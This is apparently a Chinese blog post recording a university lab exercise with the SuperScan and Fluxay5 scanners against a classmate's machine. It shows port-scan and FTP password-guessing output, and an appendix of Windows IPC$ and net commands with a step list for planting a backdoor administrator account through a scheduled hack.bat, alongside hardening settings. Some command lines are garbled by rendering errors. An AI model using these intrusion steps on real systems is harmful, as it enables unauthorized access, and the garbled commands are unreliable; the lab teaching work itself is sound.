网络安全-扫描器X-SCANNER应用实验

一、实验目的:

掌握网络端口扫描器的使用方法,熟悉常见端口和其对应的服务程序,掌握发现系统漏洞的方法。
掌握综合扫描及安全评估工具的使用方法,了解进行简单系统漏洞入侵的方法,了解常见的网络和系统漏洞以及其 安全防护方法。

二、实验环境:

实验室所有机器安装了Windows操作系统,并组成了一个 局域网,并且都安装了SuperScan端口扫描工具和流光 Fluxay5综合扫描工具。

三、实验内容:

任务一:使用Superscan端口扫描工具并分析结果
实验步骤:
(1)在命令符提示下输入IPCONFIG查询自己的IP地址。
(2)在Superscan中的Hostname Lookup栏中,输入同组学生主机的IP 地址,可通过单击Lookup按钮获得主机名。
(3)设置IP栏、Scan type栏、Scan栏,使其对同组学生主机的所有端 口以默认的时间参数进行扫描。
(4)根据扫描结果分析主机开放的端口类型和对应的服务程序。
(5)通过“控制面板”的“管理工具”中的“服务”配置,尝试关闭或开放目 标主机上的部分服务,重新扫描,观察扫描结果的变化。

扫描结果:

A主机开放的端口:

结果1:
172.20.62.12
Hostname: [Unknown]
UDP ports (2) 123,137
Total live hosts discovered 1
Total open TCP ports 0
Total open UDP ports 2

结果2:
The IP list contains 1 entries
Service TCP ports: 179
Service UDP ports: 88
Packet delay: 10
Discovery passes: 1
ICMP pinging for host discovery: Yes
Host discovery ICMP timeout: 2000
TCP banner grabbing timeout: 8000
UDP banner grabbing timeout: 8000
Service scan passes: 1
Hostname resolving passes: 1
Full connect TCP scanning for service scanning: No
Service scanning TCP timeout: 4000
Service scanning UDP timeout: 2000
TCP source port: 0
UDP source port: 0
Enable hostname lookup: Yes
Enable banner grabbing: Yes
Scan started: 01/13/19 13:52:06
-------- Scan of 1 hosts started --------
Scanning 1 machines with 1 remaining.
-------- Host discovery pass 1 of 1 --------
Host discovery ICMP (Echo) scan (1 hosts)…
1 new machines discovered with ICMP (Echo)
TCP service scan (SYN) pass 1 of 1 (1 hosts x 179 ports)…
UDP service scan pass 1 of 1 (1 hosts x 88 ports)…
Performing hostname resolution…
Performing banner grabs…
TCP banner grabbing (0 ports)
UDP banner grabbing (2 ports)
Reporting scan results…
-------- Scan done --------
常见端口的关闭方法:
1、关闭7.9等端口:关闭Simple TCP/IP Service,支持以下TCP/IP 服务: Character Generator, Daytime, Discard, Echo, 以及Quote of the Day。
2、关闭80端口:关掉WWW服务。在“服务”中显示名称为“World Wide Web Publishing Service”,通过Internet 信息服务的管理单元提供Web 连接和管理。
3、关掉25端口:关闭Simple Mail Transport Protocol (SMTP)服务,它提供的 功能是跨网传送电子邮件。
4、关掉21端口:关闭FTP Publishing Service,它提供的服务是通过Internet 信 息服务的管理单元提供FTP 连接和管理。
5、关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令 行运行控制台程序。 6、关掉139端口,139端口是NetBIOSSession端口,用来文件和打印共享, 关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议 (TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的 NETBIOS”,打勾就关闭了139端口。

利用TCP/IP筛选:网上邻居属性-本地连接属性-常规-internet协议(TCP/IP) 属性-高级-选项-TCP/IP筛选-属性-TCP端口-只允许139,445,这样其他端口 都被关闭了。

关闭一些端口后:
扫描结果1:
Live hosts this batch: 1
172.20.62.12
Hostname: [Unknown]
UDP ports (1) 123

Total live hosts discovered 1
Total open TCP ports 0
Total open UDP ports 1

扫描结果2:
The IP list contains 1 entries
Service TCP ports: 179
Service UDP ports: 88
Packet delay: 10
Discovery passes: 1
ICMP pinging for host discovery: Yes
Host discovery ICMP timeout: 2000
TCP banner grabbing timeout: 8000
UDP banner grabbing timeout: 8000
Service scan passes: 1
Hostname resolving passes: 1
Full connect TCP scanning for service scanning: No
Service scanning TCP timeout: 4000
Service scanning UDP timeout: 2000
TCP source port: 0
UDP source port: 0
Enable hostname lookup: Yes
Enable banner grabbing: Yes

Scan started: 01/13/19 14:56:21

-------- Scan of 1 hosts started --------
Scanning 1 machines with 1 remaining.
-------- Host discovery pass 1 of 1 --------
Host discovery ICMP (Echo) scan (1 hosts)…
1 new machines discovered with ICMP (Echo)
TCP service scan (SYN) pass 1 of 1 (1 hosts x 179 ports)…
UDP service scan pass 1 of 1 (1 hosts x 88 ports)…
Performing hostname resolution…
Performing banner grabs…
TCP banner grabbing (0 ports)
UDP banner grabbing (1 ports)
Reporting scan results…
-------- Scan done --------

可以看出端口关闭成功。

任务二:使用综合扫描工具Fluxay5并分析结果
Fluxay5简单介绍:

选择“文件(F)”→“高级扫描向导(W)”可打开高级扫描向导,设置扫描参数。

实验步骤:
(1)开放FTP服务,允许匿名连接。
(2)打开流光FLUXAY5工具,使用“高级扫描向导”进行设 置,使其能对同组学生主机的全部端口、服务、漏洞、所 有用户等进行全面的扫描。
(3)仔细观察扫描结果,分析同组学生主机上存在的各种 漏洞。
(4)根据扫描结果分析FTP漏洞:如结果显示有漏洞,则 利用“流光”提供的入侵菜单进行FTP连接,尝试上传或下 载文件。
(5)根据扫描结果分析IPC$ 漏洞: IPC是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获 得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用 IPC$,连接者可以与目标主机建立一个空连接而无需用户名和密码,从而可 以得到目标主机上的用户列表,并可能破解用户密码。

探测结果:

FLUXAY5控制台输出结果:
写入日志文件…OK.
PORT-> 主机 172.20.62.12 端口 5631 …关闭
PORT-> 主机 172.20.62.12 端口 0111 …关闭
PORT-> 主机 172.20.62.12 端口 0636 …关闭
PORT-> 主机 172.20.62.12 端口 0194 …关闭
PORT-> 主机 172.20.62.12 端口 0043 …关闭
PORT-> 主机 172.20.62.12 端口 0220 …关闭
PORT-> 主机 172.20.62.12 端口 0162 …关闭
PORT-> 主机 172.20.62.12 端口 6000 …关闭
PORT-> 主机 172.20.62.12 端口 3306 …关闭
PORT-> 主机 172.20.62.12 端口 0515 …关闭
PORT-> 主机 172.20.62.12 端口 0161 …关闭
PORT-> 主机 172.20.62.12 端口 8000 …关闭
PORT-> 主机 172.20.62.12 端口 0137 …关闭
PORT-> 主机 172.20.62.12 端口 0069 …关闭
PORT-> 主机 172.20.62.12 端口 1433 …关闭
PORT-> 主机 172.20.62.12 端口 0513 …关闭
PORT-> 主机 172.20.62.12 端口 1521 …关闭
PORT-> 主机 172.20.62.12 端口 0023 …关闭
FTP-> 猜解 172.20.62.12 端口 21…account:password
FTP-> 猜解 172.20.62.12 端口 21…account:pass
FTP-> 猜解 172.20.62.12 端口 21…account:passwd
FTP-> 猜解 172.20.62.12 端口 21…account:12345678
PORT-> 主机 172.20.62.12 端口 1080 …关闭
FTP-> 猜解 172.20.62.12 端口 21…account:account
PLUGIN-> 主机 172.20.62.12 在端口 3268 连接失败, 中止…
PLUGIN-> 扫描 172.20.62.12 SunOS FTP CWD Verify Username …
PLUGIN-> 扫描 172.20.62.12 SMB Get OS …
PLUGIN-> 扫描 172.20.62.12 QPOP Verify User …
PLUGIN-> 扫描 172.20.62.12 NULL Session Avaliable …
PLUGIN-> 主机 172.20.62.12 在端口 80 连接失败, 中止…
PLUGIN-> 主机 172.20.62.12 在端口 80 连接失败, 中止…
PLUGIN-> 主机 172.20.62.12 在端口 80 连接失败, 中止…
PLUGIN-> 主机 172.20.62.12 在端口 8080 连接失败, 中止…
扫描结束
正在处理扫描结果,请耐心等待…
+OK 保存状态成功
开始接收扫描结果 …
接收扫描结果 …OK
连接被远程主机中断.

生成的HTML结果:
端口扫描
21(FTP Control)
110(POP3)
25(SMTP)
445(Windows 2000 SMB)
139(SMB)
FTP扫描
FTP版本信息: Welcome to JDFW FTP Server V4.0.0

SMTP扫描
SMTP版本信息: e
支持EXPN

Plugins
Remote Host OS is Windows 5.1 (Via SMB)
Remote Host Null Session could be Established.

附:
IPC相关命令:1.建立和目标的ipc相关命令: 1.建立和目标的ipc相关命令:1.建立和目标的ipc连接命令:net use \目标IP\ipc$ “密码”/user:“ADMIN” (管理员账号),如:net use \192.168.27.128\ipcKaTeX parse error: Expected 'EOF', got '\盘' at position 74: …use 本地 盘符\\目标IP\̲盘̲符,如:net use z:\192.168.27.128\c$
3.和目标建立了ipc后,则可直接用IP加盘符加后,则可直接用IP加盘符加后,则可直接用IP加盘符加访问。比如:copy 文件名 \IP\盘符KaTeX parse error: Expected 'EOF', got '\路' at position 1: \̲路̲径\文件名,如:copy ha…,也可 直接对映射为本地磁盘的网络驱动器操作。
4.管理计算机上面的账号命令:net user
查看账号命令:net user
建立账号命令:net user name passwd/add(net user sysbak123456 /add :添加用户名为sysback,密码为123456的账号)
删除账号命令:net user name /delete
5.管理工作组命令:net localgroup组名用户名/add[delete]
如:net localgroupadministrators sysback/add。该命令表示把 sysback用户添加到管理员组(administrators)。
6.查看目标计算机的系统时间:net time \ip
7.在远程主机上建立计划任务:at \IP TIME COMMAND
at \192.168.27.128 13:45 c:\hack.bat(该命令表示在下午13点45分 执行目标主机C盘中的hack.bat文件,时间一定要晚于当前远程主机系 统时间)
8.删除和目标的ipcKaTeX parse error: Expected 'EOF', got '\ipc' at position 18: …命令:net use \\IP\̲i̲p̲c̲ /del
9.断开所有IPC$连接:net use * /del
10.禁止建立空连接:运行regedit,找到主键[HKEY_LOCAL_MACHINE \SYSTEM \CurrentControlSet\Control \LSA] ,把RestrictAnonymous (DWORD)的键值改为:00000001。
11.禁止自动打开默认共享:找到主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Lanm anServer\Parameters],把AutoShareServer(DWORD)的键值改 为:00000000, 如果不存在,就新建一个再改键值。

利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵,步骤:
1.编写批处理文件hack.bat,文件中包含两个命令:1)建立一个新账号,2) 将新账号加入administrators组。
2.使用net命令与目标主机建立连接
3.将批处理文件hack.back拷贝至目标主机上。
4.通过计划任务使目标主机执行hack.bat文件。
5.断开所有IPC$连接。
6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。
7.删除和目标主机的连接。

执行安全防护措施:
1.目标主机对注册表进行修改:禁止建立空连接,禁止自动打开默认共享
2.重新使用net命令与目标主机建立连接,观察结果是否有变化。
————————————————
版权声明:本文为CSDN博主「快乐的小小程序猿」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/xu_benjamin/article/details/86770893

  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
X-Scan-v3.3 使用说明 一. 系统要求:Windows NT/2000/XP/2003 理论上可运行于Windows NT系列操作系统,推荐运行于Windows 2000以上的Server版Windows系统。 二. 功能简介: 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能。扫描内容包括:远程服 务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等 二十几个大类。对于多数已知漏洞,我们给出了相应的漏洞描述、解决方案及详细描述链接,其它漏洞资 料正在进一步整理完善中,您也可以通过本站的“安全文摘”和“安全漏洞”栏目查阅相关说明。 3.0及后续版本提供了简单的插件开发包,便于有编程基础的朋友自己编写或将其他调试通过的代码 修改为X-Scan插件。另外Nessus攻击脚本的翻译工作已经开始,欢迎所有对网络安全感兴趣的朋友参与。 需要“Nessus攻击脚本引擎”源代码、X-Scan插件SDK、示例插件源代码或愿意参与脚本翻译工作的朋友 ,可通过本站“X-Scan”项目链接获取详细资料:“http://www.xfocus.net/projects/X- Scan/index.html”。 三. 所需文件: xscan_gui.exe -- X-Scan图形界面主程序 checkhost.dat -- 插件调度主程序 update.exe -- 在线升级主程序 *.dll -- 主程序所需动态链接库 使用说明.txt -- X-Scan使用说明 /dat/language.ini -- 多语言配置文件,可通过设置“LANGUAGE\SELECTED”项进行语 言切换 /dat/language.* -- 多语言数据文件 /dat/config.ini -- 当前配置文件,用于保存当前使用的所有设置 /dat/*.cfg -- 用户自定义配置文件 /dat/*.dic -- 用户名/密码字典文件,用于检测弱口令用户 /plugins -- 用于存放所有插件(后缀名为.xpn) /scripts -- 用于存放所有NASL脚本(后缀名为.nasl) /scripts/desc -- 用于存放所有NASL脚本多语言描述(后缀名为.desc) /scripts/cache -- 用于缓存所有NASL脚本信息,以便加快扫描速度(该目录可删除 ) 四. 准备工作: X-Scan是完全免费软件,无需注册,无需安装(解压缩即可运行,自动检查并安装WinPCap驱动程序 )。若已经安装的WinPCap驱动程序版本不正确,请通过主窗口菜单的“工具”->“Install WinPCap”重 新安装“WinPCap 3.1 beta4”或另行安装更高版本。 五. 图形界面设置项说明: “检测范围”模块: “指定IP范围” - 可以输入独立IP地址或域名,也可输入以“-”和“,”分隔的IP范围,如 “192.168.0.1-20,192.168.1.10-192.168.1.254”,或类似“192.168.100.1/24”的掩码格式。 “从文件中获取主机列表” - 选中该复选框将从文件中读取待检测主机地址,文件格式应为纯文 本,每一行可包含独立IP或域名,也可包含以“-”和“,”分隔的IP范围。 “全局设置”模块: “扫描模块”项 - 选择本次扫描需要加载的插件。 “并发扫描”项 - 设置并发扫描的主机和并发线程数,也可以单独为每个主机的各个插件设置最 大线程数。 “网络设置”项 - 设置适合的网络适配器,若找不到网络适配器,请重新安装WinPCap 3.1 beta4 以上版本驱动。 “扫描报告”项 - 扫描结束后生成的报告文件名,保存在LOG目录下。扫描报告目前支持TXT、 HTML和XML三种格式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值